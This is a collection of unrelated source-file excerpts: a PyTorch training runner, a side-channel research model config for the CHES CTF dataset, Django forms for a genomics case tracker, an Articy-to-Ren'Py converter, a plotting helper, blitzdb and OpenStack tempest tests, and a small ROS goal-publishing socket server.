output = self.forward(batch, **kwargs)
return output
def _run_batch(self, batch: Mapping[str, Any]):
self.state.step += self.state.batch_size
batch = self._batch2device(batch, self.device)
self.state.input = batch
self.state.timer.stop("_timers/data_time")
self._run_event("batch", moment="start")
self.state.timer.start("_timers/model_time")
self._run_batch_train_step(batch=batch)
self.state.timer.stop("_timers/model_time")
self.state.timer.stop("_timers/batch_time")
self._run_event("batch", moment="end")
def _run_loader(self, loader: DataLoader):
self.state.batch_size = (
loader.batch_sampler.batch_size
if loader.batch_sampler is not None else loader.batch_size
)
self.state.step = (
self.state.step
or self.state.epoch * len(loader) * self.state.batch_size
)
# @TODO: remove time usage, use it under the hood
self.state.timer.reset()
self.state.timer.start("_timers/batch_time")
self.state.timer.start("_timers/data_time")
for i, batch in enumerate(loader):
self._run_batch(batch)
self.state.timer.reset()
if self._check_run and i >= 2:
break
self.state.timer.start("_timers/batch_time")
self.state.timer.start("_timers/data_time")
def _run_epoch(self, stage: str, epoch: int):
self._prepare_for_epoch(stage=stage, epoch=epoch)
assert self.loaders is not None
loaders = self.loaders
# @TODO: better solution with train/inference handling ?
if not self.state.stage.startswith("infer"):
assert self.state.valid_loader in loaders.keys(), \
f"'{self.state.valid_loader}' " \
f"should be in provided loaders: {list(loaders.keys())}"
else:
assert not any(x.startswith("train") for x in loaders.keys()), \
"for inference no train loader should be passed"
for loader_name, loader in loaders.items():
self.state.loader_name = loader_name
self.state.loader_len = len(loader)
self.state.need_backward = loader_name.startswith("train")
self.model.train(self.state.need_backward)
if isinstance(loader.sampler, DistributedSampler) \
and loader_name.startswith("train"):
loader.sampler.set_epoch(self.state.stage_epoch)
utils.set_global_seed(
self.experiment.initial_seed + self.state.epoch + 1
)
self._run_event("loader", moment="start")
with torch.set_grad_enabled(self.state.need_backward):
self._run_loader(loader)
self._run_event("loader", moment="end")
def _run_stage(self, stage: str):
self._prepare_for_stage(stage)
self._run_event("stage", moment="start")
for epoch in range(self.state.num_epochs):
self.state.stage_epoch = epoch
self._run_event("epoch", moment="start")
self._run_epoch(stage=stage, epoch=epoch)
self._run_event("epoch", moment="end")
if self._check_run and self.state.stage_epoch >= 2:
break
if self.state.early_stop:
self.state.early_stop = False
break
self.state.epoch += 1
self._run_event("stage", moment="end")
def run_experiment(self, experiment: _Experiment, check: bool = False):
"""
Starts the experiment
"""
self._check_run = check
self.experiment = experiment
# jupyter source code logging hack
# + hack to prevent cycle imports
# @TODO: remove hack to catalyst.dl only, not core
# from catalyst.dl.experiment import BaseExperiment
# if isinstance(self.experiment, BaseExperiment) \
# and self.experiment.logdir is not None:
# expdir = Path(os.getcwd())
# logdir = Path(self.experiment.logdir)
# utils.dump_base_experiment_code(expdir, logdir)
try:
for stage in self.experiment.stages:
self._run_stage(stage)
except (Exception, KeyboardInterrupt) as ex:
# if an exception had been raised
# before the exception-handlers were initialized
if self.loggers is None or self.callbacks is None:
raise ex
else:
self.state.exception = ex
self._run_event("exception", moment=None)
return self
__all__ = ["_Runner"]
|
the-stack_0_6240 | from sklearn import preprocessing
from . import state_space_parameters as ssp
import countermeasures.data_loader as data_loader
import numpy as np
import tensorflow as tf
MODEL_NAME = 'CHES_CTF_HW'
# Number of output neurons
NUM_CLASSES = 9 # Number of output neurons
# Input Size
INPUT_SIZE = 2200
# Batch Queue parameters
TRAIN_BATCH_SIZE = 400 # Batch size for training (scaled linearly with number of gpus used)
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 45000 # Number of training examples
VALIDATION_FROM_ATTACK_SET = True
EVAL_BATCH_SIZE = TRAIN_BATCH_SIZE # Batch size for validation
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 2500 # Number of validation examples
MAX_EPOCHS = 50 # Max number of epochs to train model
# Training Parameters
OPTIMIZER = 'Adam' # Optimizer (should be in caffe format string)
MAX_LR = 5e-3 # The max LR (scaled linearly with number of gpus used)
# Bulk data folder
BULK_ROOT = '/tudelft.net/staff-bulk/ewi/insy/CYS/spicek/jrijsdijk/rl-paper/CHES_CTF/cm_experiment_hw/'
DATA_ROOT = BULK_ROOT + '../data/'
# Trained model dir
TRAINED_MODEL_DIR = BULK_ROOT + 'trained_models'
DB_FILE = DATA_ROOT + 'ches_ctf.h5'
(TRAIN_TRACES, TRAIN_DATA), (ATTACK_TRACES, ATTACK_DATA) = data_loader.load_ches_hd5(
DB_FILE,
'/Profiling_traces/traces', '/Profiling_traces/metadata',
'/Attack_traces/traces', '/Attack_traces/metadata'
)
TRAIN_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'train_labels.npy')])
ATTACK_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'attack_labels.npy')])
NOISE_SCALE = data_loader.get_noise_scale(TRAIN_TRACES)
USE_OCLR = True
MODEL_PREPROCESSING = [
preprocessing.StandardScaler()
]
MODEL_LAYERS = [
tf.keras.layers.Conv1D(4, 100, kernel_initializer='he_uniform', activation='selu', padding='same'),
tf.keras.layers.AveragePooling1D(4, strides=4),
tf.keras.layers.Flatten(name='flatten'),
tf.keras.layers.Dense(15, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
KEY = np.load(DATA_ROOT + 'attack_key.npy')
ATTACK_KEY_BYTE = 0
ATTACK_PRECOMPUTED_BYTE_VALUES = np.array(
[[bin(x).count("1") for x in row] for row in
np.load(DATA_ROOT + f'attack_precomputed_byte{ATTACK_KEY_BYTE}_values.npy')]
)
TRACES_PER_ATTACK = 2000 # Maximum number of traces to use per attack
NUM_ATTACKS = 100 # Number of attacks to average the GE over
|
the-stack_0_6241 | """Copyright (c) 2018 Great Ormond Street Hospital for Children NHS Foundation
Trust & Birmingham Women's and Children's NHS Foundation Trust
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from datetime import datetime
from django import forms
from django.contrib.auth.models import User
from django.forms import HiddenInput, Textarea, CheckboxInput, Select, ModelChoiceField
from django.forms import BaseFormSet
from .models import *
class UserForm(forms.ModelForm):
"""
User registration form
"""
password = forms.CharField(widget=forms.PasswordInput())
role_choices = (('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff'))
role = forms.ChoiceField(choices=role_choices)
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class Meta:
model = User
fields = ('first_name', 'last_name', 'email', 'password')
class ProfileForm(forms.Form):
"""
Allows users to change their info.
TODO - Remove this as could be security risk if 2 permission layers are introduced
"""
role_choices = (('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff'),
('Unknown', 'Unknown'),)
role = forms.ChoiceField(choices=role_choices, required=False)
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class ProbandForm(forms.ModelForm):
'''
Form used for allowing users edit proband information
'''
class Meta:
model = Proband
fields = ['outcome', 'comment']
widgets = {
'outcome': Textarea(attrs={'rows': '3'}),
'comment': Textarea(attrs={'rows': '3'}),
}
class VariantValidationForm(forms.ModelForm):
"""
Form used to change values used for variant validation tracking.
"""
def __init__(self, *args, **kwargs):
super(VariantValidationForm, self).__init__(*args, **kwargs)
self.fields['validation_responsible_user'].required=False
class Meta:
model = ProbandVariant
fields = [
'validation_status',
'validation_responsible_user',
]
class AddCommentForm(forms.ModelForm):
'''
Adds a new CaseComment in the Proband page
'''
class Meta:
model = CaseComment
fields = ['comment']
class GELIRForm(forms.ModelForm):
'''
Form used for allowing users edit proband information
'''
class Meta:
model = GELInterpretationReport
fields = ['case_status', 'mdt_status', 'pilot_case', 'case_sent', 'no_primary_findings', 'case_code']
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.case_status = data['case_status']
gelir.mdt_status = data['mdt_status']
gelir.pilot_case = data['pilot_case']
gelir.case_sent = data['case_sent']
gelir.no_primary_findings = data['no_primary_findings']
gelir.case_code = data['case_code']
gelir.save(overwrite=True)
class RelativeForm(forms.ModelForm):
'''
Form used for allowing users edit Relative demographics
'''
class Meta:
model = Relative
fields = ['forename', 'surname', 'date_of_birth', 'nhs_number',
'sex', 'affected_status']
class DemogsForm(forms.ModelForm):
'''
Form used for allowing users edit proband demographics
'''
class Meta:
model = Proband
fields = ['nhs_number', 'lab_number', 'forename', 'surname', 'date_of_birth', 'sex', 'local_id', 'gmc']
class PanelForm(forms.Form):
'''
Form used for allowing users to add a panel to a proband
'''
panel = forms.ModelChoiceField(queryset=PanelVersion.objects.order_by('panel'))
class ClinicianForm(forms.Form):
'''
Form used for allowing users to change a probands clinician
'''
clinician = forms.ModelChoiceField(queryset=Clinician.objects.filter(added_by_user=True).order_by('name'))
class AddClinicianForm(forms.ModelForm):
'''
Form used in Proband View to allow users add a new Clinician
'''
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class Meta:
model = Clinician
fields = ['name', 'hospital', 'email']
class UserChoiceField(ModelChoiceField):
def label_from_instance(self, obj):
return "%s %s" % (obj.first_name, obj.last_name)
class CaseAssignForm(forms.ModelForm):
'''
Form for specifying which user a case is assigned to
'''
assigned_user = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["assigned_user"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.assigned_user = data['assigned_user']
gelir.save(overwrite=True)
class FirstCheckAssignForm(forms.ModelForm):
'''
Form for specifying which user performed the first check
'''
first_check = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["first_check"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.first_check = data['first_check']
gelir.save(overwrite=True)
class SecondCheckAssignForm(forms.ModelForm):
'''
Form for specifying which user performed the second check
'''
second_check = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["second_check"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.second_check = data['second_check']
gelir.save(overwrite=True)
class MdtForm(forms.ModelForm):
'''
Form which edits MDT instance specific fields such as date and status
'''
class Meta:
model = MDT
fields = ['description', 'date_of_mdt', 'status', 'sent_to_clinician']
class MdtSentToClinicianForm(forms.ModelForm):
'''
Form for recording the whether the MDT list has been sent to the clinician
'''
class Meta:
model = MDT
fields = ['sent_to_clinician']
def __init__(self, *args, **kwargs):
super(MdtSentToClinicianForm, self).__init__(*args, **kwargs)
self.fields['sent_to_clinician'].required = False
class ProbandMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in proband textfields
'''
class Meta:
model = Proband
fields = ('discussion', 'action')
widgets = {
'discussion': Textarea(attrs={'rows': '3'}),
'action': Textarea(attrs={'rows': '3'}),
}
class GELIRMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in proband textfields
'''
class Meta:
model = GELInterpretationReport
fields = ('case_status',)
def __init__(self, *args, **kwargs):
super(GELIRMDTForm, self).__init__(*args, **kwargs)
self.fields['case_status'].required = False
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.case_status = data['case_status']
gelir.save(overwrite=True)
class RareDiseaseMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in exit questionaire questions
'''
requires_validation = forms.ChoiceField(
choices=(
('U', 'Unknown'),
('A', 'Awaiting Validation'),
('K', 'Urgent Validation'),
('I', 'In Progress'),
('P', 'Passed Validation'),
('F', 'Failed Validation'),
('N', 'Not Required'),
)
)
class Meta:
model = RareDiseaseReport
fields = (
'contribution_to_phenotype', 'change_med',
'clinical_trial', 'requires_validation',
'discussion', 'action',
'inform_reproductive_choice', 'surgical_option',
'add_surveillance_for_relatives',
'classification', 'id',)
widgets = {
'id': HiddenInput(),
'surgical_option': CheckboxInput(),
'requires_validation': Select(),
'change_med': CheckboxInput(),
'add_surveillance_for_relatives': CheckboxInput(),
'clinical_trial': CheckboxInput(),
'inform_reproductive_choice': CheckboxInput(),
'discussion': Textarea(attrs={'rows': '4'}),
'action': Textarea(attrs={'rows': '4'})
}
def save(self, commit=True):
selected_validation_status = self.cleaned_data['requires_validation']
pv = self.instance.proband_variant
pv.validation_status = selected_validation_status
if not pv.validation_datetime_set:
pv.validation_datetime_set = datetime.now()
pv.save()
return super(RareDiseaseMDTForm, self).save(commit=commit)
class CancerMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in exit questionaire questions
'''
requires_validation = forms.ChoiceField(
choices=(
('U', 'Unknown'),
('A', 'Awaiting Validation'),
('K', 'Urgent Validation'),
('I', 'In Progress'),
('P', 'Passed Validation'),
('F', 'Failed Validation'),
('N', 'Not Required'),
)
)
class Meta:
model = CancerReport
fields = ('variant_use', 'action_type', 'validated',
'validated_assay_type',
'classification', 'id',)
widgets = {'id': HiddenInput(),
'validated': CheckboxInput(),
}
def save(self, commit=True):
selected_validation_status = self.cleaned_data['requires_validation']
pv = self.instance.proband_variant
pv.validation_status = selected_validation_status
if not pv.validation_datetime_set:
pv.validation_datetime_set = datetime.now()
pv.save()
return super(CancerMDTForm, self).save(commit=commit)
class AddNewAttendee(forms.Form):
'''
Form for allowing users to add new attendee which would then be inserted into CS, Clinician or OtherStaff table
'''
name = forms.CharField()
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
email = forms.EmailField()
role = forms.ChoiceField(choices=(('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff')))
class AddVariantForm(forms.ModelForm):
'''
Allows users to add a variant to a report. Users have to enter
chromosome, position, reference, alternate, dbsnp
TODO should check everything users enters for consistancy
'''
def clean_reference(self):
data = self.cleaned_data['reference'].strip()
if not all([f in ['A', 'T', 'G', 'C'] for f in data]):
raise forms.ValidationError("Not DNA sequence")
else:
return data
def clean_alternate(self):
data = self.cleaned_data['alternate'].strip()
if not all([f in ['A', 'T', 'G', 'C'] for f in data]):
raise forms.ValidationError("Not DNA sequence")
else:
return data
class Meta:
model = Variant
fields = ['chromosome',
'position',
'reference',
'alternate',
'db_snp_id']
widgets = {'reference': Textarea(attrs={'rows': '2'}),
'alternate': Textarea(attrs={'rows': '2'})}
class GenomicsEnglandform(forms.Form):
""" Form for entering genomics england information to render a report to be used by the scientists """
interpretation_id = forms.IntegerField(label='Interpretation ID')
# Version number of the interpretation
ir_version = forms.IntegerField(label='Version')
report_version = forms.IntegerField(label='Clinical Report Version')
class GeneSearchForm(forms.Form):
gene = forms.CharField(max_length=25, widget = forms.TextInput(attrs={'style': 'width:200px'}))
class AddCaseAlert(forms.ModelForm):
def clean_gel_id(self):
if self.cleaned_data['gel_id'].isdigit() and len(self.cleaned_data['gel_id']) >= 8:
return self.cleaned_data['gel_id'].strip()
else:
forms.ValidationError("Doesn't look like a GELID")
class Meta:
model = CaseAlert
fields = ['gel_id', 'comment', 'sample_type']
|
the-stack_0_6242 | import argparse
import json
from ArticyCoreClass import ArticyCore
from ArticyCoreClass import Character
from ArticyCoreClass import FlowFrag
from ArticyCoreClass import Episode
from ArticyCoreClass import Scene
from ArticyCoreClass import Dialog
from ArticyCoreClass import Condition
from ArticyCoreClass import Instruction
from ArticyCoreClass import Snippet
from ArticyCoreClass import Code
from ArticyCoreClass import Game
from ArticyCoreClass import Hub
parser = argparse.ArgumentParser(description='Convert the JSON file from Articy to a Renpy file')
parser.add_argument('-i', required=True, help='JSON file created by Articy (required)')
parser.add_argument('-o', required=False, help='Renpy file created from the JSON file')
args = parser.parse_args()
#print(args)
#print(args.i)
#-------------------------------------------------------------------------------
f = open(args.i)
data = json.load(f)
f.close()
TheGame: Game = None
Characters = []
FlowFrags = []
Episodes = []
Scenes = []
Dialogs = []
Conditions = []
Snippets = []
Codes = []
Instructions = []
Hubs = []
#-------------------------------------------------------------------------------
# parse the JSON file, building up internal data structures
for package in data['Packages']:
for model in package['Models']:
if model['Type']=='DialogueFragment':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
dialog = Dialog(properties['Id'], properties['Parent'], properties['MenuText'], properties['StageDirections'], properties['Speaker'], properties['Text'], outputs)
Dialogs.append(dialog)
elif model['Type']=='Instruction':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
instruction = Instruction(frag, properties['Expression'])
Instructions.append(instruction)
elif model['Type']=='Condition':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
condition = Condition(frag, properties['Expression'])
Conditions.append(condition)
elif model['Type']=='Hub':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
hub = Hub(frag, "hub")
Hubs.append(hub)
elif model['Type']=='DefaultMainCharacterTemplate_02':
properties = model['Properties']
color = properties['Color']
template = model['Template']
basic = template['DefaultBasicCharacterFeature_02']
colorR = round(255*color['r'])
colorG = round(255*color['g'])
colorB = round(255*color['b'])
char = Character(properties['Id'], properties['DisplayName'], (colorR, colorG, colorB), basic['AbreviatedName'])
Characters.append(char)
elif (model['Type']=='FlowFragment') or (model['Type']=='Dialogue'):
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
if 'Connections' in outputpin:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
FlowFrags.append(frag)
names = frag.Name.split()
if names[0].lower()[:7] == 'episode':
episode = Episode(frag)
Episodes.append(episode)
elif names[0].lower()[:5] == 'scene':
scene = Scene(frag)
Scenes.append(scene)
elif names[0].lower()[:7] == 'snippet':
scene = Snippet(frag)
Snippets.append(scene)
elif names[0].lower()[:4] == 'code':
scene = Code(frag)
Codes.append(scene)
elif names[0].lower()[:4] == 'game':
TheGame = Game(frag)
else:
print('Unhandled ???')
print(model['Type'])
print()
#-------------------------------------------------------------------------------
# For debug purposes, print out the data structures created from parsing the JSON file
print('Characters:')
Characters.sort(key=lambda character: character.Name)
for char in Characters:
print(char)
print()
print('FlowFrags:')
for frag in FlowFrags:
print(frag)
print()
print('Game:')
print(TheGame)
print()
print('Episodes:')
Episodes.sort(key=lambda episode: episode.Num)
for episode in Episodes:
print(episode)
print()
print('Scenes:')
Scenes.sort(key=lambda scene: scene.Num)
for scene in Scenes:
print(scene)
print()
print('Snippets:')
Snippets.sort(key=lambda snippet: snippet.Num)
for snippet in Snippets:
print(snippet)
print()
print('Dialogs:')
for dialog in Dialogs:
# if dialog.StageDirections == 'aurora smirks':
if dialog.StageDirections == 'art sad':
debug = 1
dialog.MakeConnections(Scenes, Characters, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs)
for dialog in Dialogs:
print(dialog)
print()
def Connections(name, clist: []):
print(name+":")
for citem in clist:
citem.MakeConnections(Scenes, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs)
print(citem)
print()
Connections('Conditions', Conditions)
Connections('Instructions', Instructions)
Connections('Code Blocks', Codes)
Connections('Snippets', Snippets)
Connections('Hubs', Hubs)
#-------------------------------------------------------------------------------
# Now translate the structures into a Ren'Py representation
TheGame.MakeLinkages(Episodes)
print(TheGame.Title())
episode = TheGame.First
while episode != None:
print(' ', episode.Title())
episode.MakeLinkages(Scenes)
scene = episode.First
while scene != None:
print(' ', f"({scene.Prefix()})", scene.Title())
scene = scene.Next()
print()
episode = episode.Next()
print()
for scene in Scenes:
scene.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes)
lines = scene.CreateRenpyScene()
if len(lines) > 0:
print(f"({scene.Prefix()}) {scene.Title()}")
print()
for line in lines:
print(line)
print()
for snippet in Snippets:
snippet.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes)
lines = snippet.CreateRenpyScene()
if len(lines) > 0:
print(f"({snippet.Prefix()}) {snippet.Title()}")
print()
for line in lines:
print(line)
print()
for scene in Scenes:
if len(scene.Images) > 0:
print(f"({scene.Prefix()}) {scene.Title()}")
for imagename in scene.Images:
print(imagename)
print()
for snippet in Snippets:
if len(snippet.Images) > 0:
print(f"({snippet.Prefix()}) {snippet.Title()}")
for imagename in snippet.Images:
print(imagename)
print()
print()
#-------------------------------------------------------------------------------
# write Rnpy code out to the specified file
if args.o != None:
f = open(args.o, "w")
# The code files
for scene in Scenes:
lines = scene.CreateRenpyScene()
if len(lines) > 0:
for line in lines:
f.write(f"{line}\n")
f.write("\n")
for snippet in Snippets:
lines = snippet.CreateRenpyScene()
if len(lines) > 0:
for line in lines:
f.write(f"{line}\n")
f.write("\n")
# List out the images needed
for scene in Scenes:
if len(scene.Images) > 0:
for imagename in scene.Images:
f.write(f"{imagename}\n")
f.write("\n")
for snippet in Snippets:
if len(snippet.Images) > 0:
for imagename in snippet.Images:
f.write(f"{imagename}\n")
f.write("\n")
f.close()
|
the-stack_0_6244 | from typing import Optional
from numbers import Number
import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
__all__ = [
'plot',
]
def plot(
df: pd.DataFrame,
*args,
zmin: Optional[Number] = None,
zmax: Optional[Number] = None,
**kwargs,
) -> go.Figure:
if zmin is None:
zmin = -1
if zmax is None:
zmax = 1
return px.imshow(get_lower_correlation_matrix(df), *args, zmin=zmin, zmax=zmax, **kwargs)
def get_lower_correlation_matrix(df: pd.DataFrame) -> pd.DataFrame:
correlation = df.corr()
return correlation.where(np.tril(np.ones(correlation.shape), k=-1).astype(bool))
|
the-stack_0_6245 | import pytest
from sqlalchemy.exc import IntegrityError
from blitzdb import Document
from blitzdb.fields import CharField, ForeignKeyField, ManyToManyField
from ..conftest import _sql_backend, get_sql_engine
class DirectorAward(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
director = ForeignKeyField('Director', backref='awards')
class Actor(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
class Movie(Document):
class Meta(Document.Meta):
autoregister = False
director = ForeignKeyField('Director', backref='movies')
actors = ManyToManyField('Actor', backref='movies')
name = CharField(indexed=True)
class Director(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
def _init_backend(backend):
backend.register(Actor)
backend.register(Movie)
backend.register(Director)
backend.register(DirectorAward)
backend.init_schema()
backend.create_schema()
ted_kotcheff = Director({'name': 'Ted Kotcheff'})
silvester_stallone = Actor({'name': 'Silvester Stallone'})
rambo = Movie({'name': 'Rambo I', 'actors': [silvester_stallone], 'director': ted_kotcheff})
oscar = DirectorAward({'name': 'Oscar', 'director': ted_kotcheff})
with backend.transaction():
backend.save(rambo)
backend.save(oscar)
@pytest.fixture
def cascade_backend(request):
engine = get_sql_engine()
backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete='CASCADE')
_init_backend(backend)
return backend
@pytest.fixture
def nocascade_backend(request):
engine = get_sql_engine()
backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete=None)
_init_backend(backend)
return backend
def test_foreign_key_delete_cascade(cascade_backend):
movie = cascade_backend.get(Movie, {})
director = cascade_backend.get(Director, {})
director.delete()
assert cascade_backend.filter(Actor, {})
assert not cascade_backend.filter(Director, {})
assert not cascade_backend.filter(Movie, {})
assert not cascade_backend.filter(DirectorAward, {})
def test_foreign_key_delete_nocascade(nocascade_backend):
movie = nocascade_backend.get(Movie, {})
actor = nocascade_backend.get(Actor, {})
director = nocascade_backend.get(Director, {})
with pytest.raises(IntegrityError):
director.delete()
assert actor in nocascade_backend.filter(Actor, {})
assert director in nocascade_backend.filter(Director, {})
assert movie in nocascade_backend.filter(Movie, {})
def test_many_to_many_delete_cascade(cascade_backend):
movie = cascade_backend.get(Movie, {})
actor = cascade_backend.get(Actor, {})
actor.delete()
assert not cascade_backend.filter(Actor, {})
assert cascade_backend.filter(Movie, {})
def test_many_to_many_delete_nocascade(nocascade_backend):
movie = nocascade_backend.get(Movie, {})
actor = nocascade_backend.get(Actor, {})
director = nocascade_backend.get(Director, {})
with pytest.raises(IntegrityError):
actor.delete()
assert actor in nocascade_backend.filter(Actor, {})
assert director in nocascade_backend.filter(Director, {})
assert movie in nocascade_backend.filter(Movie, {})
|
the-stack_0_6249 | #!/usr/bin/env python
import socket
import sys
import rospy
from geometry_msgs.msg import Pose2D
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ('10.103.118.91', 8000)
print >>sys.stderr, 'starting up on %s port %s' % server_address
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
pub = rospy.Publisher('/nav_goal', Pose2D, queue_size=10)
rospy.init_node('goal_publisher', anonymous=True)
rate = rospy.Rate(100) # 10hz
"""
starting up on 10.103.118.91 port 8000
waiting for a connection
connection from ('10.103.95.125', 43562)
received "{ "skill_name" : "Go_to","location": "water"}"
sending data back to the client
received ""
no more data from ('10.103.95.125', 43562)
waiting for a connection
"""
named_locations = {"door" : [-1, -1, 0], "water": [-2, -7, 0], "middle": [-1.5, -3, 0]}
def get_position_from_name(name):
try:
return named_locations[name.strip().lower()]
except:
return None
while True:
# Wait for a connection
print >>sys.stderr, 'waiting for a connection'
connection, client_address = sock.accept()
try:
print >>sys.stderr, 'connection from', client_address
# Receive the data in small chunks and retransmit it
while True:
data = connection.recv(4000)
if data:
name = data.split('"location": ')[1].replace("}", "").replace('"', '').strip()
print(name)
pos = get_position_from_name(name)
if pos is not None:
for _ in range(10):
pub.publish(*pos)
else:
print >>sys.stderr, 'no more data from', client_address
break
finally:
# Clean up the connection
connection.close() |
the-stack_0_6250 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from tempest.api.object_storage import base
from tempest.common.utils.data_utils import rand_name
from tempest import exceptions
from tempest.test import attr
from tempest.test import HTTP_SUCCESS
class AccountTest(base.BaseObjectTest):
@classmethod
def setUpClass(cls):
super(AccountTest, cls).setUpClass()
cls.containers = []
for i in xrange(ord('a'), ord('f') + 1):
name = rand_name(name='%s-' % chr(i))
cls.container_client.create_container(name)
cls.containers.append(name)
cls.containers_count = len(cls.containers)
@classmethod
def tearDownClass(cls):
cls.delete_containers(cls.containers)
super(AccountTest, cls).tearDownClass()
@attr(type='smoke')
def test_list_containers(self):
# list of all containers should not be empty
params = {'format': 'json'}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertIsNotNone(container_list)
container_names = [c['name'] for c in container_list]
for container_name in self.containers:
self.assertIn(container_name, container_names)
@attr(type='smoke')
def test_list_containers_with_limit(self):
# list containers one of them, half of them then all of them
for limit in (1, self.containers_count / 2, self.containers_count):
params = {'limit': limit}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), limit)
@attr(type='smoke')
def test_list_containers_with_marker(self):
# list containers using marker param
# first expect to get 0 container as we specified last
# the container as marker
# second expect to get the bottom half of the containers
params = {'marker': self.containers[-1]}
resp, container_list = \
self.account_client.list_account_containers(params=params)
self.assertEqual(len(container_list), 0)
params = {'marker': self.containers[self.containers_count / 2]}
